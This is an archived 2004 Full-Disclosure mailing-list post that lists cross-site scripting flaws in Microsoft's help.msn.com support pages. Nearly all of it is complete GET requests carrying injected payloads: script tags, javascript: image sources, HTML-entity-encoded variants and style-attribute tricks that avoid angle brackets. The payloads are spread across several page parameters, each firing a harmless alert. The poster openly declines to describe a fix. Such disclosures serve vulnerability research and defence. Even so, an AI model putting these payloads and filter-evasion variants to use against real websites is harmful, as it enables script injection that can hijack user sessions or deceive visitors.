lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
From: contact_jamie_fisher at yahoo.co.uk (jamie fisher)
Subject: help.msn.com

This is gonna be quick'n'dirty.  My dinner is almost cooked...
 
More XSS for MSN to add to the list:
 
1. Cross site scripting (In JavaScript context)
 
http://help.msn.com/en_au/DirectedHelpControls.asp
 
1.1 GET /en_au/DirectedHelpControls.asp?DataMarket=%27%2Balert(%27Bills Momma%27)%2B%27&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
1.2 GET /en_au/DirectedHelpControls.asp?DataMarket=%22%2Balert(%27Bills Momma%27)%2B%22&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
1.3 /en_au/DirectedHelpControls.asp?DataMarket=en_au&ITSFile=%27%2Balert(%27Bills Momma%27)%2B%27&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
1.4 GET /en_au/DirectedHelpControls.asp?DataMarket=en_au&ITSFile=%22%2Balert(%27Bills Momma%27)%2B%22&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
1.5 GET /en_au/DirectedHelpControls.asp?DataMarket=en_au&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=%27%2Balert(%27Bills Momma%27)%2B%27 HTTP/1.0
 
2 Cross site scripting (Standard variants)
 
http://help.msn.com/EN_AU/Search/xfind_utf8.asp
 
2.1 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=>"><script>alert("Bills Momma")</script>&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
2.2 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=>%22%27><img%20src%3d%22javascript:alert(%27Bills Momma%27)%22>&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
2.3 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=>"><script>alert("Bills Momma")</script>&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0
 
2.4 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=>%22%27><img%20src%3d%22javascript:alert(%27Appscan%20-%20CSS%20attack%20may%20be%20used%27)%22>&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0
 
3 Cross site scripting (Standard variants)
 
http://help.msn.com/en_au/DirectedHelpControls.asp
 
3.1 GET /en_au/DirectedHelpControls.asp?DataMarket=>"><script>alert("Bills Momma")</script>&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
3.2 GET /en_au/DirectedHelpControls.asp?DataMarket=>%22%27><img%20src%3d%22javascript:alert(%27Bills Momma%27)%22>&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
4 Cross site scripting using HTML entities
 
http://help.msn.com/EN_AU/Search/xfind_utf8.asp
 
4.1 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Bills%26%23x20;Momma%26quot;)>&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
4.2 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Bills%26%23x20;Momma%26quot;)>&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0
 
5 Cross site scripting using HTML entities
 
http://help.msn.com/en_au/DirectedHelpControls.asp
 
5.1 GET /en_au/DirectedHelpControls.asp?DataMarket=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Bills%26%23x20;Momma%26quot;)>&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
6 Cross site scripting without using '<' and '>' symbols
 
http://help.msn.com/EN_AU/Search/xfind_utf8.asp
 
6.1 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
6.2 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0
 
7 Cross site scripting without using '<' and '>' symbols
 
http://help.msn.com/en_au/directedhelp.asp
 
7.1 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
7.2 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=en_au&ITSFile=%22%20style%3D%22background:url(javascript:alert(%Bills%20Momma%27))%22%20OA%3D%22&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
7.3 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=en_au&ITSFile=HotmailPIMv10.its51&v4Var=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
7.4 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=en_au&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22 HTTP/1.0
 
I won't say how to fix.  The last time I ran XSS by a website (Kevin Mitnicks), some nematode <">http://nematode.unl.edu/wormgen.htm> refuted my mitigating fix.  Bearing in mind the triviality of XSS I really shouldn't have bothered; but I did.
 
<!--# Greets:
 Hulk Hogan, Bills Momma, the homeless guy I pass on my way into the office (who incidentally, will code for food), my keypad, and all the lads on the contract where I am currently -->
 
 
 


---------------------------------
Moving house? Beach bar in Thailand? New Wardrobe? Win ?10k with Yahoo! Mail to make your dream a reality.

		
---------------------------------
Win a castle  for NYE with your mates and Yahoo! Messenger 
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20041207/6eae6bd4/attachment.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ